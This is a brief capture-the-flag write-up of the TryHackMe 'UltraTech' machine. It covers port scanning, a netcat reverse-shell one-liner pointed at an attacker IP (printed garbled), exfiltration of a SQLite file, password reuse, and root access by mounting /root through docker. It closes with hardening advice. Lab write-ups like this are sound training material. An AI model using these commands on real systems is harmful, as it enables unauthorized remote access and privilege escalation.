“UltraTech” is a boot2root machine on TryHackMe. It has intermediate difficulty. You have been contracted by UltraTech to pentest their infrastructure. It is a grey-box kind of assessment, the only information you have is the company’s name and their server’s IP address.


First of all an Nmap scan was used to scan all ports on the target machine.

sudo nmap -p- -oN nmap/all -vv
sudo nmap -p21,22,8081,31331 -sC -sV -O -oN nmap/scripts -vv
Pinging the attacker machine
Receiving the ping

Initial Access

The following bash script was created and served by the attacker via HTTP.


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 443 >/tmp/f<attacker ip>/
SQLITE database file
Exfiltration via netcat

Privilege Escalation to r00t

“r00t” is also a user on the box. A privilege escalation to “r00t” was possible because of a password reuse.

Privilege Escalation

The privilege escalation could be accomplished by abusing the docker command.

docker run -v /root:/mnt -it bash


The filter on the API should be hardened. Furthermore functionality that is not ready to use, should not be deployed on a live machine. Also passwords should not be hashed with the MD5 hash function. An appropriate password hashing function should be used instead, e.g. PBKDF2. Also the password policy should prohibit the use of common passwords. The reuse of password should also be prohibited. Users of the organization should be encouraged to follow the password policy. Also keep in mind that adding a user to the docker group, will also give them root rights. The user r00t should not be in the docker group if not needed.

Passionate about Cyber Security. I am publishing CTF writeups and Cybersec content!